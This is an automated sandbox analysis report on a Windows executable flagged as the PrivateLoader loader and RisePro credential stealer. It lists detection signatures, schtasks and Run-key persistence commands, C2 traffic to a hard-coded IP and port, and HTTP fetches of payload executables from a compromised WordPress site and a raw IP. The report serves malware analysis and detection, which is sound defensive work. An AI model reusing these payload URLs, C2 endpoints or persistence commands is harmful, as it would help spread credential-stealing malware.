Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1440169
MD5:a594a9e1f8db460345e86810d1c9a639
SHA1:ca9a256f48c6059909926c6fa547c56f9a2df9c0
SHA256:d8e3a7e5df4c2591b40d2af7a224c6e5cb18e11d27cbfdbfdda4e02db33c849e
Tags:exe
Infos:

Detection

PrivateLoader, RisePro Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected PrivateLoader
Yara detected RisePro Stealer
Creates HTML files with .exe extension (expired dropper behavior)
Found stalling execution ending in API Sleep call
PE file contains section with special chars
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
AV process strings found (often used to terminate AV products)
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found decision node followed by non-executed suspicious APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE / OLE file has an invalid certificate
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Startup Folder File Write
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 2608 cmdline: "C:\Users\user\Desktop\file.exe" MD5: A594A9E1F8DB460345E86810D1C9A639)
    • schtasks.exe (PID: 2892 cmdline: schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\MSIUpdaterV2.exe" /tn "MSIUpdaterV2_c81e728d9d4c2f636f067f89cc14862c HR" /sc HOURLY /rl HIGHEST MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 3184 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • schtasks.exe (PID: 5016 cmdline: schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\MSIUpdaterV2.exe" /tn "MSIUpdaterV2_c81e728d9d4c2f636f067f89cc14862c LG" /sc ONLOGON /rl HIGHEST MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 5036 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
PrivateLoaderAccording to sekoia, PrivateLoader is a modular malware whose main capability is to download and execute one or several payloads. The loader implements anti-analysis techniques, fingerprints the compromised host and reports statistics to its C2 server.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.privateloader

Malware Configuration

No configs have been found

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Temp\_LQmmrlytjrHiMTfplY7yVS.zipJoeSecurity_RiseProStealerYara detected RisePro StealerJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000003.2602349258.00000000064D0000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_PrivateLoaderYara detected PrivateLoaderJoe Security
      00000000.00000003.2602143972.0000000006419000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_PrivateLoaderYara detected PrivateLoaderJoe Security
        00000000.00000003.2602388516.0000000006454000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_PrivateLoaderYara detected PrivateLoaderJoe Security
          00000000.00000002.3215883795.00000000062D2000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RiseProStealerYara detected RisePro StealerJoe Security
            00000000.00000003.2601984271.0000000006490000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_PrivateLoaderYara detected PrivateLoaderJoe Security
              Click to see the 6 entries

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              0.3.file.exe.6454b80.4.raw.unpackJoeSecurity_PrivateLoaderYara detected PrivateLoaderJoe Security
                0.3.file.exe.6454b80.2.raw.unpackJoeSecurity_PrivateLoaderYara detected PrivateLoaderJoe Security
                  0.2.file.exe.6b70000.1.unpackJoeSecurity_PrivateLoaderYara detected PrivateLoaderJoe Security
                    0.2.file.exe.6b70000.1.raw.unpackJoeSecurity_PrivateLoaderYara detected PrivateLoaderJoe Security
                      0.3.file.exe.64909c0.1.raw.unpackJoeSecurity_PrivateLoaderYara detected PrivateLoaderJoe Security
                        Click to see the 1 entries

                        Sigma Signatures

                        System Summary

                        barindex
                        Sigma detected: CurrentVersion Autorun Keys Modification
                        Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Local\AdobeUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\AdobeUpdaterV2.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\file.exe, ProcessId: 2608, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\AdobeUpdaterV2_c81e728d9d4c2f636f067f89cc14862c
                        Sigma detected: Startup Folder File Write
                        Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\Desktop\file.exe, ProcessId: 2608, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EdgeMS2.lnk

                        Snort Signatures

                        Timestamp:05/12/24-12:31:54.639253
                        SID:2049660
                        Source Port:50500
                        Destination Port:49706
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:05/12/24-12:31:56.533300
                        SID:2046266
                        Source Port:50500
                        Destination Port:49724
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:05/12/24-12:30:54.955577
                        SID:2049060
                        Source Port:49706
                        Destination Port:50500
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:05/12/24-12:31:54.793116
                        SID:2046269
                        Source Port:49706
                        Destination Port:50500
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:05/12/24-12:30:57.462316
                        SID:2046267
                        Source Port:50500
                        Destination Port:49706
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:05/12/24-12:30:59.409434
                        SID:2046268
                        Source Port:49706
                        Destination Port:50500
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:05/12/24-12:30:55.309898
                        SID:2046266
                        Source Port:50500
                        Destination Port:49706
                        Protocol:TCP
                        Classtype:A Network Trojan was detected

                        Joe Sandbox Signatures

                        Click to jump to signature section

                        Show All Signature Results

                        AV Detection

                        barindex
                        Antivirus / Scanner detection for submitted sample
                        Source: file.exeAvira: detected
                        Antivirus detection for URL or domain
                        Source: https://easy2buy.ae/wp-content/plugins/ht-mega-for-elementor/assets/js/waypoints.js?ver=2.2.0Avira URL Cloud: Label: malware
                        Source: https://easy2buy.ae/wp-content/plugins/header-footer-elementor/assets/css/header-footer-elementor.csAvira URL Cloud: Label: malware
                        Source: https://easy2buy.ae/wp-content/plugins/newhome-core/assets/plugins/modernizr/modernizr.js?ver=6.5.3Avira URL Cloud: Label: malware
                        Source: https://easy2buy.ae/wp-content/plugins/contact-form-7/includes/js/index.js?ver=5.7.7Avira URL Cloud: Label: malware
                        Source: https://easy2buy.ae/wp-content/plugins/elementor/assets/js/webpack.runtime.min.js?ver=3.14.0Avira URL Cloud: Label: malware
                        Source: https://easy2buy.ae/wp-content/upgrade/k.exeYAvira URL Cloud: Label: malware
                        Source: https://easy2buy.ae/wp-content/upgrade/k.exeAvira URL Cloud: Label: malware
                        Source: https://easy2buy.ae/wp-content/plugins/elementor/assets/lib/font-awesome/css/solid.min.css?ver=5.15.Avira URL Cloud: Label: malware
                        Source: https://easy2buy.ae/wp-content/plugins/qi-addons-for-elementor/inc/shortcodes/parallax-images/assetsAvira URL Cloud: Label: malware
                        Source: https://easy2buy.ae/wp-content/plugins/qi-blocks/assets/dist/main.css?ver=6.5.3Avira URL Cloud: Label: malware
                        Source: https://easy2buy.ae/wp-content/uploads/2023/06/logo-white.pngAvira URL Cloud: Label: malware
                        Source: https://easy2buy.ae/wp-content/themes/newhome/assets/js/main.min.js?ver=6.5.3Avira URL Cloud: Label: malware
                        Source: https://easy2buy.ae/wp-content/plugins/newhome-core/inc/maps/assets/js/google-map.js?ver=6.5.3Avira URL Cloud: Label: malware
                        Source: https://easy2buy.ae/wp-content/uploads/elementor/css/custom-frontend-lite.min.css?ver=1690457761Avira URL Cloud: Label: malware
                        Source: https://easy2buy.ae/wp-content/plugins/ht-mega-for-elementor/assets/css/htmega-keyframes.css?ver=2.2Avira URL Cloud: Label: malware
                        Source: https://easy2buy.ae/wp-content/plugins/woocommerce/assets/js/jquery-blockui/jquery.blockUI.min.js?veAvira URL Cloud: Label: malware
                        Source: https://easy2buy.ae/wp-content/plugins/newhome-core/assets/css/newhome-core.min.css?ver=6.5.3Avira URL Cloud: Label: malware
                        Source: https://easy2buy.ae/wp-content/uploads/2023/03/error-page-bg-img.jpg);Avira URL Cloud: Label: malware
                        Source: https://easy2buy.ae/wp-content/plugins/ht-mega-for-elementor/assets/js/popper.min.js?ver=2.2.0Avira URL Cloud: Label: malware
                        Source: https://easy2buy.ae/wp-content/plugins/qi-blocks/inc/slider/assets/plugins/5.4.5/swiper.min.css?ver=Avira URL Cloud: Label: malware
                        Source: https://easy2buy.ae/wp-content/uploads/2023/06/logo.pngAvira URL Cloud: Label: malware
                        Source: https://easy2buy.ae/wp-content/uploads/elementor/css/global.css?ver=1690457762Avira URL Cloud: Label: malware
                        Source: https://easy2buy.ae/wp-content/plugins/qi-addons-for-elementor/assets/css/main.min.css?ver=6.5.3Avira URL Cloud: Label: malware
                        Source: https://easy2buy.ae/wp-content/plugins/qode-framework/inc/common/assets/plugins/select2/select2.fullAvira URL Cloud: Label: malware
                        Source: https://easy2buy.ae/wp-content/plugins/newhome-core/inc/icons/font-awesome/assets/css/all.min.css?veAvira URL Cloud: Label: malware
                        Source: https://easy2buy.ae/wp-content/uploads/2023/06/cropped-fav-192x192.pngAvira URL Cloud: Label: malware
                        Source: https://easy2buy.ae/wp-content/uploads/elementor/css/custom-widget-icon-box.min.csAvira URL Cloud: Label: malware
                        Source: https://easy2buy.ae/wp-content/plugins/header-footer-elementor/inc/js/frontend.js?ver=1.6.14Avira URL Cloud: Label: malware
                        Source: https://easy2buy.ae/wp-content/themes/newhome/assets/css/main.min.css?ver=6.5.3Avira URL Cloud: Label: malware
                        Source: https://easy2buy.ae/wp-content/plugins/woocommerce/assets/js/js-cookie/js.cookie.min.js?ver=2.1.4-wcAvira URL Cloud: Label: malware
                        Source: https://easy2buy.ae/wp-content/plugins/elementor/assets/lib/font-awesome/css/fontawesome.min.css?verAvira URL Cloud: Label: malware
                        Source: https://easy2buy.ae/wp-content/themes/newhome/style.css?ver=6.5.3Avira URL Cloud: Label: malware
                        Source: https://easy2buy.ae/wp-content/plugins/ht-mega-for-elementor/assets/css/animation.css?ver=2.2.0Avira URL Cloud: Label: malware
                        Source: https://easy2buy.ae/wp-content/plugins/ht-mega-for-elementor/assets/js/htbbootstrap.js?ver=2.2.0Avira URL Cloud: Label: malware
                        Source: https://easy2buy.ae/wp-content/plugins/qi-blocks/assets/dist/main.js?ver=6.5.3Avira URL Cloud: Label: malware
                        Source: https://easy2buy.ae/wp-content/plugins/newhome-core/inc/plugins/elementor/assets/js/elementor.min.jsAvira URL Cloud: Label: malware
                        Source: https://easy2buy.ae/wp-content/uploads/elementor/css/post-2951.css?ver=1690457763Avira URL Cloud: Label: malware
                        Source: https://easy2buy.ae/wp-content/upgrade/k.exexeAvira URL Cloud: Label: malware
                        Source: https://easy2buy.ae/wp-content/plugins/qi-addons-for-elementor/inc/plugins/elementor/assets/js/elemeAvira URL Cloud: Label: malware
                        Source: https://easy2buy.ae/wp-content/plugins/newhome-core/inc/maps/assets/js/custom-marker.js?ver=6.5.3Avira URL Cloud: Label: malware
                        Source: https://easy2buy.ae/wp-content/plugins/newhome-core/assets/js/newhome-core.min.js?ver=6.5.3Avira URL Cloud: Label: malware
                        Source: https://easy2buy.ae/wp-content/plugins/newhome-core/inc/maps/assets/js/markerclusterer.js?ver=6.5.3Avira URL Cloud: Label: malware
                        Source: https://easy2buy.ae/wp-content/plugins/revslider/public/assets/js/rs6.min.js?ver=6.6.13Avira URL Cloud: Label: malware
                        Source: https://easy2buy.ae/wp-content/plugins/elementor/assets/js/frontend-modules.min.js?ver=3.14.0Avira URL Cloud: Label: malware
                        Source: https://easy2buy.ae/wp-content/plugins/page-links-to/dist/new-tab.js?ver=3.3.6Avira URL Cloud: Label: malware
                        Source: https://easy2buy.ae/wp-content/uploads/elementor/css/custom-widget-icon-box.min.css?ver=1687512247Avira URL Cloud: Label: malware
                        Source: https://easy2buy.ae/wp-content/plugins/custom-twitter-feeds/css/ctf-styles.min.css?ver=2.1.1Avira URL Cloud: Label: malware
                        Multi AV Scanner detection for domain / URL
                        Source: https://easy2buy.ae:80/wp-content/upgrade/k.exeVirustotal: Detection: 5%Perma Link
                        Multi AV Scanner detection for submitted file
                        Source: file.exeReversingLabs: Detection: 63%
                        Source: file.exeVirustotal: Detection: 57%Perma Link
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B66A80 CryptUnprotectData,0_2_00B66A80
                        Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                        Source: unknownHTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.5:49707 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.75.166:443 -> 192.168.2.5:49708 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 185.199.220.53:443 -> 192.168.2.5:49722 version: TLS 1.2

                        Spreading

                        barindex
                        Yara detected PrivateLoader
                        Source: Yara matchFile source: 0.3.file.exe.6454b80.4.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.3.file.exe.6454b80.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.file.exe.6b70000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.file.exe.6b70000.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.3.file.exe.64909c0.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.file.exe.aa0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000000.00000003.2602349258.00000000064D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000003.2602143972.0000000006419000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000003.2602388516.0000000006454000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000003.2601984271.0000000006490000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.3216150564.0000000006B70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000003.2602058976.0000000006B77000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.3214709406.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06BB2EAD GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,___std_fs_open_handle@16,GetFileInformationByHandleEx,GetLastError,GetFileInformationByHandleEx,GetFileInformationByHandleEx,0_2_06BB2EAD
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06BCCCFD FindFirstFileExW,0_2_06BCCCFD
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06B7B2C0 FindFirstFileA,CreateDirectoryA,GetLastError,CopyFileA,GetLastError,CopyFileA,GetLastError,CopyFileA,GetLastError,FindNextFileA,FindClose,GetLastError,0_2_06B7B2C0
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06B7BAC0 FindFirstFileA,SetFileAttributesA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,GetLastError,SetFileAttributesA,GetLastError,RemoveDirectoryA,GetLastError,0_2_06B7BAC0

                        Networking

                        barindex
                        Snort IDS alert for network traffic
                        Source: TrafficSnort IDS: 2049060 ET TROJAN RisePro TCP Heartbeat Packet 192.168.2.5:49706 -> 5.42.96.65:50500
                        Source: TrafficSnort IDS: 2046266 ET TROJAN [ANY.RUN] RisePro TCP (Token) 5.42.96.65:50500 -> 192.168.2.5:49706
                        Source: TrafficSnort IDS: 2046267 ET TROJAN [ANY.RUN] RisePro TCP (External IP) 5.42.96.65:50500 -> 192.168.2.5:49706
                        Source: TrafficSnort IDS: 2046268 ET TROJAN [ANY.RUN] RisePro TCP v.0.x (Get_settings) 192.168.2.5:49706 -> 5.42.96.65:50500
                        Source: TrafficSnort IDS: 2046269 ET TROJAN [ANY.RUN] RisePro TCP (Activity) 192.168.2.5:49706 -> 5.42.96.65:50500
                        Source: TrafficSnort IDS: 2049660 ET TROJAN RisePro CnC Activity (Outbound) 5.42.96.65:50500 -> 192.168.2.5:49706
                        Source: TrafficSnort IDS: 2046266 ET TROJAN [ANY.RUN] RisePro TCP (Token) 5.42.96.65:50500 -> 192.168.2.5:49724
                        Yara detected PrivateLoader
                        Source: Yara matchFile source: 0.3.file.exe.6454b80.4.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.3.file.exe.6454b80.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.file.exe.6b70000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.file.exe.6b70000.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.3.file.exe.64909c0.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.file.exe.aa0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000000.00000003.2602349258.00000000064D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000003.2602143972.0000000006419000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000003.2602388516.0000000006454000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000003.2601984271.0000000006490000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.3216150564.0000000006B70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000003.2602058976.0000000006B77000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.3214709406.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Creates HTML files with .exe extension (expired dropper behavior)
                        Source: C:\Users\user\Desktop\file.exeFile created: 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr
                        Source: C:\Users\user\Desktop\file.exeFile created: AdobeUpdaterV2.exe.0.dr
                        Source: C:\Users\user\Desktop\file.exeFile created: MSIUpdaterV2.exe.0.dr
                        Source: C:\Users\user\Desktop\file.exeFile created: EdgeMS2.exe.0.dr
                        Source: global trafficTCP traffic: 192.168.2.5:49706 -> 5.42.96.65:50500
                        Source: Joe Sandbox ViewIP Address: 34.117.186.192 34.117.186.192
                        Source: Joe Sandbox ViewIP Address: 34.117.186.192 34.117.186.192
                        Source: Joe Sandbox ViewIP Address: 193.233.132.175 193.233.132.175
                        Source: Joe Sandbox ViewIP Address: 193.233.132.175 193.233.132.175
                        Source: Joe Sandbox ViewASN Name: RU-KSTVKolomnaGroupofcompaniesGuarantee-tvRU RU-KSTVKolomnaGroupofcompaniesGuarantee-tvRU
                        Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                        Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                        Source: unknownDNS query: name: ipinfo.io
                        Source: unknownDNS query: name: ipinfo.io
                        Source: global trafficHTTP traffic detected: GET /widget/demo/81.181.60.11 HTTP/1.1Connection: Keep-AliveReferer: https://ipinfo.io/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Host: ipinfo.io
                        Source: global trafficHTTP traffic detected: GET /demo/home.php?s=81.181.60.11 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Host: db-ip.com
                        Source: global trafficHTTP traffic detected: GET /wp-content/upgrade/k.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.36Host: easy2buy.aeCache-Control: no-cache
                        Source: unknownTCP traffic detected without corresponding DNS query: 5.42.96.65
                        Source: unknownTCP traffic detected without corresponding DNS query: 5.42.96.65
                        Source: unknownTCP traffic detected without corresponding DNS query: 5.42.96.65
                        Source: unknownTCP traffic detected without corresponding DNS query: 5.42.96.65
                        Source: unknownTCP traffic detected without corresponding DNS query: 5.42.96.65
                        Source: unknownTCP traffic detected without corresponding DNS query: 5.42.96.65
                        Source: unknownTCP traffic detected without corresponding DNS query: 5.42.96.65
                        Source: unknownTCP traffic detected without corresponding DNS query: 5.42.96.65
                        Source: unknownTCP traffic detected without corresponding DNS query: 5.42.96.65
                        Source: unknownTCP traffic detected without corresponding DNS query: 5.42.96.65
                        Source: unknownTCP traffic detected without corresponding DNS query: 5.42.96.65
                        Source: unknownTCP traffic detected without corresponding DNS query: 5.42.96.65
                        Source: unknownTCP traffic detected without corresponding DNS query: 5.42.96.65
                        Source: unknownTCP traffic detected without corresponding DNS query: 5.42.96.65
                        Source: unknownTCP traffic detected without corresponding DNS query: 5.42.96.65
                        Source: unknownTCP traffic detected without corresponding DNS query: 5.42.96.65
                        Source: unknownTCP traffic detected without corresponding DNS query: 5.42.96.65
                        Source: unknownTCP traffic detected without corresponding DNS query: 5.42.96.65
                        Source: unknownTCP traffic detected without corresponding DNS query: 5.42.96.65
                        Source: unknownTCP traffic detected without corresponding DNS query: 5.42.96.65
                        Source: unknownTCP traffic detected without corresponding DNS query: 5.42.96.65
                        Source: unknownTCP traffic detected without corresponding DNS query: 5.42.96.65
                        Source: unknownTCP traffic detected without corresponding DNS query: 5.42.96.65
                        Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.175
                        Source: unknownTCP traffic detected without corresponding DNS query: 5.42.96.65
                        Source: unknownTCP traffic detected without corresponding DNS query: 5.42.96.65
                        Source: unknownTCP traffic detected without corresponding DNS query: 5.42.96.65
                        Source: unknownTCP traffic detected without corresponding DNS query: 5.42.96.65
                        Source: unknownTCP traffic detected without corresponding DNS query: 5.42.96.65
                        Source: unknownTCP traffic detected without corresponding DNS query: 5.42.96.65
                        Source: unknownTCP traffic detected without corresponding DNS query: 5.42.96.65
                        Source: unknownTCP traffic detected without corresponding DNS query: 5.42.96.65
                        Source: unknownTCP traffic detected without corresponding DNS query: 5.42.96.65
                        Source: unknownTCP traffic detected without corresponding DNS query: 5.42.96.65
                        Source: unknownTCP traffic detected without corresponding DNS query: 5.42.96.65
                        Source: unknownTCP traffic detected without corresponding DNS query: 5.42.96.65
                        Source: unknownTCP traffic detected without corresponding DNS query: 5.42.96.65
                        Source: unknownTCP traffic detected without corresponding DNS query: 5.42.96.65
                        Source: unknownTCP traffic detected without corresponding DNS query: 5.42.96.65
                        Source: unknownTCP traffic detected without corresponding DNS query: 5.42.96.65
                        Source: unknownTCP traffic detected without corresponding DNS query: 5.42.96.65
                        Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.175
                        Source: unknownTCP traffic detected without corresponding DNS query: 5.42.96.65
                        Source: unknownTCP traffic detected without corresponding DNS query: 5.42.96.65
                        Source: unknownTCP traffic detected without corresponding DNS query: 5.42.96.65
                        Source: unknownTCP traffic detected without corresponding DNS query: 5.42.96.65
                        Source: unknownTCP traffic detected without corresponding DNS query: 5.42.96.65
                        Source: unknownTCP traffic detected without corresponding DNS query: 5.42.96.65
                        Source: unknownTCP traffic detected without corresponding DNS query: 5.42.96.65
                        Source: unknownTCP traffic detected without corresponding DNS query: 5.42.96.65
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B67A80 recv,setsockopt,recv,recv,recv,recv,recv,recv,__Xtime_get_ticks,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,Sleep,Sleep,0_2_00B67A80
                        Source: global trafficHTTP traffic detected: GET /widget/demo/81.181.60.11 HTTP/1.1Connection: Keep-AliveReferer: https://ipinfo.io/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Host: ipinfo.io
                        Source: global trafficHTTP traffic detected: GET /demo/home.php?s=81.181.60.11 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Host: db-ip.com
                        Source: global trafficHTTP traffic detected: GET /wp-content/upgrade/k.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.36Host: easy2buy.aeCache-Control: no-cache
                        Source: file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.drString found in binary or memory: <a class="elementor-icon elementor-social-icon elementor-social-icon-facebook-f elementor-repeater-item-2a80dba" href="https://www.facebook.com/profile.php?id=100092856517575" target="_blank"> equals www.facebook.com (Facebook)
                        Source: file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.drString found in binary or memory: <a class="elementor-icon elementor-social-icon elementor-social-icon-linkedin-in elementor-repeater-item-ae5da3c" href="http://www.linkedin.com/in/franti equals www.linkedin.com (Linkedin)
                        Source: global trafficDNS traffic detected: DNS query: ipinfo.io
                        Source: global trafficDNS traffic detected: DNS query: db-ip.com
                        Source: global trafficDNS traffic detected: DNS query: easy2buy.ae
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closeexpires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0content-type: text/html; charset=UTF-8link: <https://easy2buy.ae/wp-json/>; rel="https://api.w.org/"transfer-encoding: chunkeddate: Sun, 12 May 2024 10:31:52 GMTserver: LiteSpeedvary: User-Agentalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                        Source: file.exe, 00000000.00000002.3215883795.000000000630F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2085945219.00000000017AF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2601885569.000000000630F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2086587679.00000000017AF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2086176899.00000000017B3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3215228010.00000000017B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.132.175/server/k/l2.exe
                        Source: file.exe, 00000000.00000002.3215883795.000000000630F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2601885569.000000000630F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.132.175/server/k/l2.exeJp
